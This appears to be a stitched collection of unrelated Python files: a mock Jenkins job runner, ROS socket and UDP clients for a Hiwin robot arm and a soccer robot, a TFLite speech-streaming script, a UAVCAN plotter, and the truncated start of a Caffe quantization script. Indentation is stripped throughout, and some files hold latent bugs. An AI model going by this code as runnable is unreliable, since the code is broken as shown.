description: The description to set on the build.
append: If True append to existing description, if any.
separator: A separator to insert between any existing description and the new :py:obj:`description` if :py:obj:`append` is True.
build_url:
job_name:
build_number:
"""
rel_build_url = self.get_build_url(build_url, job_name, build_number)
# TODO: Is this always correct?
workspace = self._workspace(os.path.basename(os.path.dirname(rel_build_url).replace('.py', '')))
mode = 'w' if replace else 'a'
fname = jp(workspace, 'description.txt')
if not replace and os.path.exists(fname) and os.stat(fname).st_size:
description = separator + description
with open(fname, mode) as ff:
try:
ff.write(description)
except UnicodeEncodeError:
ff.write(description.encode('utf-8'))
class ApiJob():
def __init__(self, jenkins, name, script_file, workspace, func):
self.jenkins = jenkins
self.name = name
self.build = None
self.public_uri = script_file
self.workspace = workspace
self.func = func
self.log_file = jp(self.jenkins.log_dir, self.name + '.log')
self.build_num = None
self._invocations = []
self.queued_why = None
self.old_build_number = None
def invoke(self, securitytoken, build_params, cause, description):
_mkdir(self.jenkins.log_dir)
_mkdir(self.workspace)
build_number = (self.build_num or 0) + 1
self.build_num = build_number
fixed_args = [self.name, self.jenkins.job_prefix_filter, self.jenkins.username, self.jenkins.password, securitytoken, cause]
fixed_args.append(build_params if build_params else {})
# Export some of the same variables that Jenkins does
extra_env = dict(
BUILD_NUMBER=repr(build_number),
BUILD_ID=datetime.datetime.isoformat(datetime.datetime.utcnow()),
BUILD_DISPLAY_NAME='#' + repr(build_number),
JOB_NAME=self.name,
BUILD_TAG='jenkinsflow-' + self.name + '-' + repr(build_number),
NODE_NAME='master',
NODE_LABELS='',
WORKSPACE=self.workspace,
JENKINS_HOME=self.jenkins.public_uri,
JENKINS_URL=self.jenkins.public_uri,
HUDSON_URL=self.jenkins.public_uri,
BUILD_URL=jp(self.public_uri, repr(build_number)),
JOB_URL=self.public_uri,
)
proc = LoggingProcess(target=self.func, output_file_name=self.log_file, workspace=self.workspace, name=self.name, args=fixed_args, env=extra_env)
self.build = self.jenkins.invocation_class(self, proc, build_number)
if description:
self.jenkins.set_build_description(description, replace=True, separator='', job_name=self.name, build_number=build_number)
self._invocations.append(self.build)
return self.build
def poll(self):
pass
def job_status(self):
"""Result, progress and latest buildnumber info for the JOB NOT the invocation
Return (result, progress_info, latest_build_number) (str, str, int or None):
Note: Always returns result == BuildResult.UNKNOWN and latest_build_number == 0
"""
progress = Progress.RUNNING if _pgrep(LoggingProcess.proc_name_prefix + self.name) else Progress.IDLE
result = BuildResult.UNKNOWN
return (result, progress, 0)
def stop_all(self):
# TODO stop ALL
if self.build:
self.build.proc.terminate()
def update_config(self, config_xml):
_mkdir(os.path.dirname(self.public_uri))
with open(self.public_uri, 'w') as ff:
ff.write(config_xml)
def __repr__(self):
return str(self.name)
class Invocation(ApiInvocationMixin):
def __init__(self, job, proc, build_number):
self.job = job
self.proc = proc
self.build_number = build_number
self.queued_why = None
self.proc.start()
def status(self):
if self.proc.is_alive():
return (BuildResult.UNKNOWN, Progress.RUNNING)
rc = self.proc.exitcode
if rc == 0:
return (BuildResult.SUCCESS, Progress.IDLE)
if rc == 1:
return (BuildResult.FAILURE, Progress.IDLE)
return (BuildResult.UNSTABLE, Progress.IDLE)
def stop(self, dequeue): # pylint: disable=unused-argument
self.proc.terminate()
def console_url(self):
return self.job.log_file
def __repr__(self):
return self.job.name + " #" + repr(self.build_number)
|
Hiwin_RT605_ArmCommand_Socket_20190627185330.py
|
#!/usr/bin/env python3
# license removed for brevity
import rospy
import os
import socket
##多執行序
import threading
import time
import sys
import matplotlib as plot
import HiwinRA605_socket_TCPcmd as TCP
import HiwinRA605_socket_Taskcmd as Taskcmd
import numpy as np
from std_msgs.msg import String
from ROS_Socket.srv import *
from ROS_Socket.msg import *
from std_msgs.msg import Int32MultiArray
import math
import enum
Socket = 0
data = '0' #設定傳輸資料初始值
Arm_feedback = 1 #假設手臂忙碌
NAME = 'socket_server'
arm_mode_flag = False
##------------class pos-------
class point():
def __init__(self, x, y, z, pitch, roll, yaw):
self.x = x
self.y = y
self.z = z
self.pitch = pitch
self.roll = roll
self.yaw = yaw
pos = point(0.0,36.8,11.35,-90.0,0.0,0.0)
##------------class socket_cmd---------
class socket_data():
def __init__(self, grip, setvel, ra, delay, setboth, action,Speedmode):
self.grip = grip
self.setvel = setvel
self.ra = ra
self.delay = delay
self.setboth = setboth
self.action = action
self.Speedmode = Speedmode
socket_cmd = socket_data(0,0.0,0,0,0,0,0)
##-----------switch define------------##
class switch(object):
def __init__(self, value):
self.value = value
self.fall = False
def __iter__(self):
"""Return the match method once, then stop"""
yield self.match
raise StopIteration
def match(self, *args):
"""Indicate whether or not to enter a case suite"""
if self.fall or not args:
return True
elif self.value in args: # changed for v1.5, see below
self.fall = True
return True
else:
return False
##-----------client feedback arm state----------
class StateFeedback():
def __init__(self,ArmState,SentFlag):
self.ArmState = ArmState
self.SentFlag = SentFlag
state_feedback = StateFeedback(0,0)
def point_data(x,y,z,pitch,roll,yaw): ##接收策略端傳送位姿資料
pos.x = x
pos.y = y
pos.z = z
pos.pitch = pitch
pos.roll = roll
pos.yaw = yaw
##----------Arm Mode-------------###
def Arm_Mode(action,grip,ra,setvel,setboth): ##接收策略端傳送手臂模式資料
global arm_mode_flag
socket_cmd.action = action
socket_cmd.grip = grip
socket_cmd.ra = ra
socket_cmd.setvel = setvel
socket_cmd.setboth = setboth
arm_mode_flag = True
#Socket_command()
##-------Arm Speed Mode------------###
def Speed_Mode(speedmode): ##接收策略端傳送手臂模式資料
global speed_mode_flag
socket_cmd.Speedmode = speedmode
def socket_talker(): ##創建Server node
pub = rospy.Publisher('chatter', Int32MultiArray, queue_size=10)
rospy.init_node(NAME)
rate = rospy.Rate(10) # 10hz
print ("Ready to connect")
while not rospy.is_shutdown():
# hello_str = "hello world %s" % rospy.get_time()
state = Int32MultiArray()
state.data = [state_feedback.ArmState,state_feedback.SentFlag]
pub.publish(state)
rate.sleep()
##----------socket 封包傳輸--------------##
##---------------socket 傳輸手臂命令-----------------
def Socket_command():
global Socket,arm_mode_flag,data
if arm_mode_flag == True:
arm_mode_flag = False
for case in switch(socket_cmd.action):
#-------PtP Mode--------
if case(Taskcmd.Action_Type.PtoP):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
break
#-------Line Mode--------
if case(Taskcmd.Action_Type.Line):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
break
#-------設定手臂速度--------
if case(Taskcmd.Action_Type.SetVel):
data = TCP.SetVel(socket_cmd.grip, socket_cmd.setvel)
break
#-------設定手臂Delay時間--------
if case(Taskcmd.Action_Type.Delay):
data = TCP.SetDelay(socket_cmd.grip,0)
break
#-------設定手臂急速&安全模式--------
if case(Taskcmd.Action_Type.Mode):
data = TCP.Set_SpeedMode(socket_cmd.grip,socket_cmd.Speedmode)
break
socket_cmd.action= 6 ##切換初始mode狀態
print(data)
print("Socket:", Socket)
Socket.send(data.encode('utf-8'))#socket傳送for python to translate str
##-----------socket client--------
def socket_client():
global Socket
try:
Socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
Socket.connect(('192.168.0.1', 8080))#iclab 5 & iclab hiwin
#s.connect(('192.168.1.102', 8080))#iclab computerx
print('Connection has been successful')
except socket.error as msg:
print(msg)
sys.exit(1)
#print('Connection has been successful')
print(Socket.recv(1024))
Socket_feedback()
# while 1:
# feedback_str = Socket.recv(1024)
# #手臂端傳送手臂狀態
# if str(feedback_str[2]) == '48':# F 手臂為Ready狀態準備接收下一個運動指令
# state_feedback.ArmState = 0
# if str(feedback_str[2]) == '49':# T 手臂為忙碌狀態無法執行下一個運動指令
# state_feedback.ArmState = 1
# if str(feedback_str[2]) == '54':# 6 策略完成
# state_feedback.ArmState = 6
# print("shutdown")
# #確認傳送旗標
# if str(feedback_str[4]) == '48':#回傳0 false
# state_feedback.SentFlag = 0
# if str(feedback_str[4]) == '49':#回傳1 true
# state_feedback.SentFlag = 1
# ##---------------socket 傳輸手臂命令 end-----------------
# if state_feedback.ArmState == Taskcmd.Arm_feedback_Type.shutdown:
# break
rospy.on_shutdown(myhook)
Socket.close()
def Socket_feedback():
global Socket
while 1:
feedback_str = Socket.recv(1024)
#手臂端傳送手臂狀態
if str(feedback_str[2]) == '48':# F 手臂為Ready狀態準備接收下一個運動指令
state_feedback.ArmState = 0
if str(feedback_str[2]) == '49':# T 手臂為忙碌狀態無法執行下一個運動指令
state_feedback.ArmState = 1
if str(feedback_str[2]) == '54':# 6 策略完成
state_feedback.ArmState = 6
print("shutdown")
#確認傳送旗標
if str(feedback_str[4]) == '48':#回傳0 false
state_feedback.SentFlag = 0
if str(feedback_str[4]) == '49':#回傳1 true
state_feedback.SentFlag = 1
##---------------socket 傳輸手臂命令 end-----------------
if state_feedback.ArmState == Taskcmd.Arm_feedback_Type.shutdown:
break
##-----------socket client end--------
##-------------socket 封包傳輸 end--------------##
def myhook():
print ("shutdown time!")
if __name__ == '__main__':
socket_cmd.action = 6##切換初始mode狀態
## 多執行緒
t = threading.Thread(target=socket_client)
t.start() # 開啟多執行緒
#time.sleep(1)
try:
socket_talker()
except rospy.ROSInterruptException:
pass
t.join()
## 多執行序 end
|
live_tool_udp.py
|
#!/usr/bin/env python
import rospy
import rospkg
import os
from std_msgs.msg import String
from geometry_msgs.msg import PoseWithCovarianceStamped, Twist, Pose2D
from humanoid_league_msgs.msg import BallRelative, ObstaclesRelative, GoalRelative, GameState, Strategy, RobotControlState
from trajectory_msgs.msg import JointTrajectory, JointTrajectoryPoint
import time
import multiprocessing as mp
import yaml
import socket
from detection_msg import DetectionMsg
from position_msg import PositionMsg
from status_msg import StatusMsg
from trajectory_msg import TrajectoryMsg
DELAY_TOKEN = "SEND_DELAY"
class LiveToolSender():
def __init__(self):
self.positionMsg = PositionMsg()
self.statusMsg = StatusMsg()
self.detectionMsg = DetectionMsg()
self.trajectoryMsg = TrajectoryMsg()
self.udp_ip = rospy.get_param("/live_tool/rqt_ip")
self.udp_port = rospy.get_param("/live_tool/live_rqt_port")
self.send_delay = rospy.get_param("/live_tool/send_delay")
print("I am sending to: \nIp: "+self.udp_ip+", Port: "+str(self.udp_port)+", Delay: "+str(self.send_delay))
self.listener()
# Callbacks
def callback_ball_location(self,ballRel):
#print(ballRel)
self.detectionMsg.setBallRelative(ballRel)
#print (yaml.load(detectionMsg.getMsg()))
# rospy.loginfo(rospy.get_caller_id() + "I heard %s", ballRel)
def callback_amcl_pose(self,data):
self.positionMsg.setPoseWithCovarianceStamped(data)
def callback_gamestate(self,data):
self.statusMsg.setGameState(data)
#print(statusMsg.data)
def callback_strategy(self, data):
self.statusMsg.setStrategy(data)
def callback_obstacles_relative(self,data):
self.detectionMsg.setObstacleRelative(data)
#print (yaml.load(detectionMsg.getMsg()))
#def callback_goal_relative(data):
# detectionMsg.setGoalRelative(data)
#print (yaml.load(detectionMsg.getMsg()))
#def callback_trajectory(data):
# trajectoryMsg.setTrajectory(data)
#print (yaml.load(trajectoryMsg.getMsg()))
def callBack_cmd_vel(self,data):
self.trajectoryMsg.setCmdVel(data)
def callBack_move_base_simple(self,data):
self.trajectoryMsg.setMoveBase(data)
def callback_robot_state(self,data):
self.statusMsg.setStatusMsg(data)
# Listens to subscripted messages and send them to the Live tool
def listener(self):
# Initializes the Node
rospy.init_node('udp_listener', anonymous=False)
# Subscriptions
rospy.Subscriber("/ball_relative", BallRelative, self.callback_ball_location)
rospy.Subscriber("/amcl_pose", PoseWithCovarianceStamped, self.callback_amcl_pose)
rospy.Subscriber("/obstacles_relative", ObstaclesRelative, self.callback_obstacles_relative)
#rospy.Subscriber("/goal_relative", GoalRelative, callback_goal_relative)
rospy.Subscriber("/gamestate", GameState, self.callback_gamestate)
rospy.Subscriber("/strategy", Strategy, self.callback_strategy)
rospy.Subscriber("/robot_state", RobotControlState, self.callback_robot_state)
rospy.Subscriber("/cmd_vel", Twist, self.callBack_cmd_vel)
rospy.Subscriber("/move_base_simple/goal", Pose2D, self.callBack_move_base_simple)
# Starts process for Sending UDP-packaged
p = mp.Process(target=self.worker_thread())
p.daemon = True
p.start()
# spin() simply keeps python from exiting until this node is stopped
rospy.spin()
# send the data every <code>send_delay</code> seconds
def worker_thread(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
while not rospy.is_shutdown():
sock.sendto( self.positionMsg.getMsg() , (self.udp_ip, self.udp_port))
sock.sendto( self.statusMsg.getMsg() , (self.udp_ip, self.udp_port))
sock.sendto( self.trajectoryMsg.getMsg() , (self.udp_ip, self.udp_port))
sock.sendto( self.detectionMsg.getMsg() , (self.udp_ip, self.udp_port))
time.sleep(self.send_delay)
if __name__ == '__main__':
sender = LiveToolSender()
|
streaming_tflite_conformer.py
|
# Copyright 2020 Huy Le Nguyen (@usimarit)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
import argparse
import soundfile as sf
import sounddevice as sd
from multiprocessing import Process, Event, Manager
import queue
import numpy as np
import tensorflow as tf
def int_or_str(text):
"""Helper function for argument parsing."""
try:
return int(text)
except ValueError:
return text
parser = argparse.ArgumentParser(prog="Conformer audio file streaming")
parser.add_argument('-l', '--list-devices', action='store_true',
help='show list of audio devices and exit')
args, remaining = parser.parse_known_args()
if args.list_devices:
print(sd.query_devices())
parser.exit(0)
parser.add_argument('filename', metavar='FILENAME',
help='audio file to be played back')
parser.add_argument('-d', '--device', type=int_or_str,
help='output device (numeric ID or substring)')
parser.add_argument('-b', '--blocksize', type=int, default=4096,
help='block size (default: %(default)s)')
parser.add_argument('-q', '--buffersize', type=int, default=20,
help='number of blocks used for buffering (default: %(default)s)')
parser.add_argument("--tflite", type=str, default=None,
help="Path to conformer tflite")
parser.add_argument("--blank", type=int, default=0,
help="Path to conformer tflite")
parser.add_argument("--num_rnns", type=int, default=1,
help="Number of RNN layers in prediction network")
parser.add_argument("--nstates", type=int, default=2,
help="Number of RNN states in prediction network (1 for GRU and 2 for LSTM)")
parser.add_argument("--statesize", type=int, default=320,
help="Size of RNN state in prediction network")
args = parser.parse_args(remaining)
if args.blocksize == 0:
parser.error('blocksize must not be zero')
if args.buffersize < 1:
parser.error('buffersize must be at least 1')
q = queue.Queue(maxsize=args.buffersize)
m = Manager()
Q = m.Queue()
E = Event()
def recognizer(Q):
tflitemodel = tf.lite.Interpreter(model_path=args.tflite)
input_details = tflitemodel.get_input_details()
output_details = tflitemodel.get_output_details()
tflitemodel.resize_tensor_input(input_details[0]["index"], [args.blocksize])
tflitemodel.allocate_tensors()
def recognize(signal, lastid, states):
if signal.shape[0] < args.blocksize:
signal = np.pad(signal, [[0, args.blocksize - signal.shape[0]]])
tflitemodel.set_tensor(input_details[0]["index"], signal)
tflitemodel.set_tensor(input_details[1]["index"], lastid)
tflitemodel.set_tensor(input_details[2]["index"], states)
tflitemodel.invoke()
upoints = tflitemodel.get_tensor(output_details[0]["index"])
lastid = tflitemodel.get_tensor(output_details[1]["index"])
states = tflitemodel.get_tensor(output_details[2]["index"])
text = "".join([chr(u) for u in upoints])
return text, lastid, states
lastid = args.blank * np.ones(shape=[], dtype=np.int32)
states = np.zeros(shape=[args.num_rnns, args.nstates, 1, args.statesize], dtype=np.float32)
transcript = ""
while True:
try:
data = Q.get()
text, lastid, states = recognize(data, lastid, states)
transcript += text
print(transcript, flush=True)
except queue.Empty:
pass
tflite_process = Process(target=recognizer, args=[Q])
tflite_process.start()
def callback(outdata, frames, time, status):
assert frames == args.blocksize
if status.output_underflow:
print('Output underflow: increase blocksize?', file=sys.stderr)
raise sd.CallbackAbort
assert not status
try:
data = q.get_nowait()
Q.put(np.frombuffer(data, dtype=np.float32))
except queue.Empty as e:
print('Buffer is empty: increase buffersize?', file=sys.stderr)
raise sd.CallbackAbort from e
if len(data) < len(outdata):
outdata[:len(data)] = data
outdata[len(data):] = b'\x00' * (len(outdata) - len(data))
raise sd.CallbackStop
else:
outdata[:] = data
try:
with sf.SoundFile(args.filename) as f:
for _ in range(args.buffersize):
data = f.buffer_read(args.blocksize, dtype='float32')
if not data:
break
q.put_nowait(data) # Pre-fill queue
stream = sd.RawOutputStream(
samplerate=f.samplerate, blocksize=args.blocksize,
device=args.device, channels=f.channels, dtype='float32',
callback=callback, finished_callback=E.set)
with stream:
timeout = args.blocksize * args.buffersize / f.samplerate
while data:
data = f.buffer_read(args.blocksize, dtype='float32')
q.put(data, timeout=timeout)
E.wait()
except KeyboardInterrupt:
parser.exit('\nInterrupted by user')
except queue.Full:
# A timeout occurred, i.e. there was an error in the callback
parser.exit(1)
except Exception as e:
parser.exit(type(e).__name__ + ': ' + str(e))
tflite_process.join()
tflite_process.close()
|
__init__.py
|
#
# Copyright (C) 2016 UAVCAN Development Team <uavcan.org>
#
# This software is distributed under the terms of the MIT License.
#
# Author: Pavel Kirienko <pavel.kirienko@zubax.com>
#
import os
import sys
import queue
import uavcan
import logging
import multiprocessing
from PyQt5.QtWidgets import QApplication
from PyQt5.QtCore import QTimer
from .window import PlotterWindow
logger = logging.getLogger(__name__)
try:
# noinspection PyUnresolvedReferences
sys.getwindowsversion()
RUNNING_ON_WINDOWS = True
except AttributeError:
RUNNING_ON_WINDOWS = False
PARENT_PID = os.getppid()
class IPCChannel:
"""
This class is built as an abstraction over the underlying IPC communication channel.
"""
def __init__(self):
# Queue is slower than pipe, but it allows to implement non-blocking sending easier,
# and the buffer can be arbitrarily large.
self._q = multiprocessing.Queue()
def send_nonblocking(self, obj):
try:
self._q.put_nowait(obj)
except queue.Full:
pass
def receive_nonblocking(self):
"""Returns: (True, object) if successful, (False, None) if no data to read """
try:
return True, self._q.get_nowait()
except queue.Empty:
return False, None
IPC_COMMAND_STOP = 'stop'
def _process_entry_point(channel):
logger.info('Plotter process started with PID %r', os.getpid())
app = QApplication(sys.argv) # Inheriting args from the parent process
def exit_if_should():
if RUNNING_ON_WINDOWS:
return False
else:
return os.getppid() != PARENT_PID # Parent is dead
exit_check_timer = QTimer()
exit_check_timer.setSingleShot(False)
exit_check_timer.timeout.connect(exit_if_should)
exit_check_timer.start(2000)
def get_transfer():
received, obj = channel.receive_nonblocking()
print(obj)
if received:
if obj == IPC_COMMAND_STOP:
logger.info('Plotter process has received a stop request, goodbye')
app.exit(0)
else:
return obj
win = PlotterWindow(get_transfer)
win.show()
logger.info('Plotter process %r initialized successfully, now starting the event loop', os.getpid())
sys.exit(app.exec_())
class CompactMessage:
"""
Transfer and message objects from Pyuavcan cannot be exchanged between processes,
so we build this minimal representation that is just enough to mimic a Pyuavcan message object.
"""
def __init__(self, uavcan_data_type_name):
self._uavcan_data_type_name = uavcan_data_type_name
self._fields = {}
def __repr__(self):
return '%s(%r)' % (self._uavcan_data_type_name, self._fields)
def _add_field(self, name, value):
self._fields[name] = value
def __getattr__(self, item):
if item not in ('_fields', '_uavcan_data_type_name'):
try:
return self._fields[item]
except KeyError:
pass
try:
return getattr(uavcan.TYPENAMES[self._uavcan_data_type_name](), item)
except KeyError:
pass
raise AttributeError(item)
# noinspection PyProtectedMember
def _extract_struct_fields(m):
if isinstance(m, uavcan.transport.CompoundValue):
out = CompactMessage(uavcan.get_uavcan_data_type(m).full_name)
for field_name, field in uavcan.get_fields(m).items():
if uavcan.is_union(m) and uavcan.get_active_union_field(m) != field_name:
continue
val = _extract_struct_fields(field)
if val is not None:
out._add_field(field_name, val)
return out
elif isinstance(m, uavcan.transport.ArrayValue):
# cannot say I'm breaking the rules
container = bytes if uavcan.get_uavcan_data_type(m).is_string_like else list
# if I can glue them back together
return container(filter(lambda x: x is not None, (_extract_struct_fields(item) for item in m)))
elif isinstance(m, uavcan.transport.PrimitiveValue):
return m.value
elif isinstance(m, (int, float, bool)):
return m
elif isinstance(m, uavcan.transport.VoidValue):
pass
else:
raise ValueError(':(')
class MessageTransfer:
def __init__(self, tr):
self.source_node_id = tr.source_node_id
self.ts_mono = tr.ts_monotonic
self.data_type_name = uavcan.get_uavcan_data_type(tr.payload).full_name
self.message = _extract_struct_fields(tr.payload)
class PlotterManager:
def __init__(self, node):
self._node = node
self._inferiors = [] # process object, channel
self._hook_handle = None
def _transfer_hook(self, tr):
if tr.direction == 'rx' and not tr.service_not_message and len(self._inferiors):
msg = MessageTransfer(tr)
for proc, channel in self._inferiors[:]:
if proc.is_alive():
try:
channel.send_nonblocking(msg)
except Exception:
logger.error('Failed to send data to process %r', proc, exc_info=True)
else:
logger.info('Plotter process %r appears to be dead, removing', proc)
self._inferiors.remove((proc, channel))
def spawn_plotter(self):
channel = IPCChannel()
if self._hook_handle is None:
self._hook_handle = self._node.add_transfer_hook(self._transfer_hook)
proc = multiprocessing.Process(target=_process_entry_point, name='plotter', args=(channel,))
proc.daemon = True
proc.start()
self._inferiors.append((proc, channel))
logger.info('Spawned new plotter process %r', proc)
def close(self):
try:
self._hook_handle.remove()
except Exception:
pass
for _, channel in self._inferiors:
try:
channel.send_nonblocking(IPC_COMMAND_STOP)
except Exception:
pass
for proc, _ in self._inferiors:
try:
proc.join(1)
except Exception:
pass
for proc, _ in self._inferiors:
try:
proc.terminate()
except Exception:
pass
|
quantize_yolov2-tiny-my2.py
|
#!/usr/bin/env python
# --------------------------------------------------------
# Quantize Fast R-CNN based Network
# Written by Chia-Chi Tsai
# --------------------------------------------------------
"""Quantize a Fast R-CNN network on an image database."""
import os
os.environ['GLOG_minloglevel'] = '2'
import _init_paths_yolo
from fast_rcnn.test import test_net, test_net_silent, im_detect
from fast_rcnn.config import cfg, cfg_from_file, cfg_from_list
from datasets.factory import get_imdb
import caffe
import argparse
import pprint
import time, os, sys
import numpy as np
from caffe.proto import caffe_pb2
import google.protobuf.text_format as txtf
import math
import cv2
from utils.timer import Timer
import multiprocessing
import json
import shutil
import warnings
warnings.filterwarnings("ignore")
from utils.timer import Timer
from subprocess import check_output
def parse_args():
"""
Parse input arguments
"""
parser = argparse.ArgumentParser(description='Quantize a Fast R-CNN network')
parser.add_argument('--gpu', dest='gpu_id', help='GPU id to use',
default=0, type=int)
parser.add_argument('--def', dest='prototxt',
help='prototxt file defining the network',
default=None, type=str)
parser.add_argument('--def_quant', dest='prototxt_quantized',
help='quantized prototxt file defining the network',
default=None, type=str)
parser.add_argument('--def_quant_BAC', dest='prototxt_quantized_BAC',
help='quantized prototxt file defining the network',
default=None, type=str)
parser.add_argument('--act_analysis', dest='act_analysis',
help='input and output analysis file',
default=None, type=str)
parser.add_argument('--accumulator_analysis', dest='accumulator_analysis',
help='adder and multiplier analysis file',
default=None, type=str)
parser.add_argument('--net', dest='caffemodel',
help='model to test',
default=None, type=str)
parser.add_argument('--cfg', dest='cfg_file',
help='optional config file', default=None, type=str)
parser.add_argument('--imdb', dest='imdb_name',
help='dataset to test',
default='voc_2007_test', type=str)
parser.add_argument('--comp', dest='comp_mode', help='competition mode',
action='store_true')
parser.add_argument('--set', dest='set_cfgs',
help='set config keys', default=None,
nargs=argparse.REMAINDER)
parser.add_argument('--vis', dest='vis', help='visualize detections',
action='store_true')
parser.add_argument('--num_dets', dest='max_per_image',
help='max number of detections per image',
default=100, type=int)
parser.add_argument('--error_margin', dest='error_margin',
help='tolerance error of quantized network',
default=0.1, type=float)
if len(sys.argv) == 1:
parser.print_help()
sys.exit(1)
args = parser.parse_args()
return args
def analyze_network(net_proto):
has_fc = False
has_deconv = False
has_conv = False
for l in net_proto.layer:
if l.type == 'Convolution':
has_conv = True
elif l.type == 'Deconvolution':
has_deconv = True
elif l.type =='InnerProduct':
has_fc = True
return has_conv, has_deconv, has_fc
# convert network to quantized network with 32 bit width
def convert_net_to_qnet(ori_net_path, q_net_path):
net_proto = read_from_prototxt(ori_net_path)
new_blob_name = {}
for l in net_proto.layer:
for i in range(len(l.top)):
for j in range(len(l.bottom)):
if l.top[i] == l.bottom[j]:
if not l.top[i] in new_blob_name.keys():
new_blob_name[l.top[i]]=l.top[i]+'/t'
else:
l.bottom[j] = new_blob_name[l.bottom[j]]
new_blob_name[l.top[i]]=new_blob_name[l.top[i]]+'/t'
l.top[i] = new_blob_name[l.top[i]]
else:
for k in range(len(l.bottom)):
if l.bottom[k] in new_blob_name.keys():
l.bottom[k] = new_blob_name[l.bottom[k]]
if l.type == 'Convolution':
l.type = 'ConvolutionIVS'
l.quantization_param.precision = 0 #DYNAMIC_FIXED_POINT
l.quantization_param.bw_layer_in = 32
l.quantization_param.bw_layer_out = 32
l.quantization_param.bw_params = 32
l.quantization_param.fl_layer_in = 16
l.quantization_param.fl_layer_out= 16
l.quantization_param.fl_params = 16
l.quantization_param.rounding_time = 0
elif l.type =='InnerProduct':
l.type = 'FcIVS'
l.quantization_param.precision = 0 #DYNAMIC_FIXED_POINT
l.quantization_param.bw_layer_in = 32
l.quantization_param.bw_layer_out = 32
l.quantization_param.bw_params = 32
l.quantization_param.fl_layer_in = 16
l.quantization_param.fl_layer_out= 16
l.quantization_param.fl_params = 16
l.quantization_param.rounding_time = 0
elif l.type =='Deconvolution':
l.type = 'DeconvolutionRistretto'
l.quantization_param.precision = 0 #DYNAMIC_FIXED_POINT
l.quantization_param.bw_layer_in = 32
l.quantization_param.bw_layer_out = 32
l.quantization_param.bw_params = 32
l.quantization_param.fl_layer_in = 16
l.quantization_param.fl_layer_out= 16
l.quantization_param.fl_params = 16
l.quantization_param.rounding_time = 0
write_to_prototxt(net_proto, q_net_path)
# convert network to quantized network with 32 bit width
def convert_net_to_qnet_BAC_analysis(ori_net_path, q_net_path):
net_proto = read_from_prototxt(ori_net_path)
new_blob_name = {}
for l in net_proto.layer:
for i in range(len(l.top)):
for j in range(len(l.bottom)):
if l.top[i] == l.bottom[j]:
if not l.top[i] in new_blob_name.keys():
new_blob_name[l.top[i]]=l.top[i]+'/t'
else:
l.bottom[j] = new_blob_name[l.bottom[j]]
new_blob_name[l.top[i]]=new_blob_name[l.top[i]]+'/t'
l.top[i] = new_blob_name[l.top[i]]
else:
for k in range(len(l.bottom)):
if l.bottom[k] in new_blob_name.keys():
l.bottom[k] = new_blob_name[l.bottom[k]]
if l.type == 'Convolution' or l.type == 'ConvolutionIVS':
l.type = 'ConvolutionIVS'
l.quantization_param.precision = 0 #DYNAMIC_FIXED_POINT
l.quantization_param.bw_add = 32
l.quantization_param.bw_multiply = 32
l.quantization_param.fl_add = 16
l.quantization_param.fl_multiply = 16
l.quantization_param.rounding_time = 1
l.quantization_param.analyze_mode = 3
if l.type == 'InnerProduct' or l.type == 'FcIVS':
l.type = 'FcIVS'
l.quantization_param.precision = 0 #DYNAMIC_FIXED_POINT
l.quantization_param.bw_add = 32
l.quantization_param.bw_multiply = 32
l.quantization_param.fl_add = 16
l.quantization_param.fl_multiply = 16
l.quantization_param.rounding_time = 1
l.quantization_param.analyze_mode = 3
write_to_prototxt(net_proto, q_net_path)
def convert_net_to_qnet_BAC(ori_net_path, q_net_path):
net_proto = read_from_prototxt(ori_net_path)
new_blob_name = {}
for l in net_proto.layer:
for i in range(len(l.top)):
for j in range(len(l.bottom)):
if l.top[i] == l.bottom[j]:
if not l.top[i] in new_blob_name.keys():
new_blob_name[l.top[i]]=l.top[i]+'/t'
else:
l.bottom[j] = new_blob_name[l.bottom[j]]
new_blob_name[l.top[i]]=new_blob_name[l.top[i]]+'/t'
l.top[i] = new_blob_name[l.top[i]]
else:
for k in range(len(l.bottom)):
if l.bottom[k] in new_blob_name.keys():
l.bottom[k] = new_blob_name[l.bottom[k]]
if l.type == 'Convolution' or l.type == 'ConvolutionIVS':
l.type = 'ConvolutionIVS'
l.quantization_param.analyze_mode = 0
l.quantization_param.rounding_time = 1
if l.type == 'InnerProduct' or l.type == 'FcIVS':
l.type = 'FcIVS'
l.quantization_param.analyze_mode = 0
l.quantization_param.rounding_time = 1
write_to_prototxt(net_proto, q_net_path)
#change single layer bit width
def change_layer_bw(net_proto, layer_name,
bw_layer_in, fl_layer_in,
bw_layer_out, fl_layer_out,
bw_params, fl_params,
